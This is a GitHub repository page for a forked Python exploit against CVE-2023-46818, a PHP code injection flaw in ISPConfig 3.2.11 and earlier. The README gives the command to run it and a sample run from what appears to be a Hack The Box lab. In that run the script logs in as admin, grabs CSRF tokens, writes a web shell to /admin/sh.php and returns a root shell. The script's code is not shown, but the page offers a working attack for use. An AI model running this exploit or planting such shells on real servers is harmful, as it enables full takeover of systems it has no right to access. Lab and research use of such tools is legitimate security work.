Skip to content
/ CVE-2023-46818 Public
forked from ajdumanhug/CVE-2023-46818

CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability

0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

LaalyS/CVE-2023-46818

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
CVE-2023-46818.py
CVE-2023-46818.py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-46818 Python Exploit

🔥 Description

This Python exploit script targets a security vulnerability in ISPConfig's records POST parameter to /admin/language_edit.php, which is not properly sanitized. This allows an authenticated admin to inject and execute arbitrary PHP code.

⚠️ Affected Versions

Version 3.2.11 and prior versions.

⚙️ Usage

python3 CVE-2023-46818.py <URL> <Username> <Password>

💻 Sample Run

┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell#

ℹ️ Reference

https://seclists.org/fulldisclosure/2023/Dec/2

❤️ Credits

Shout out to Egidio Romano for this discovery.

About

CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%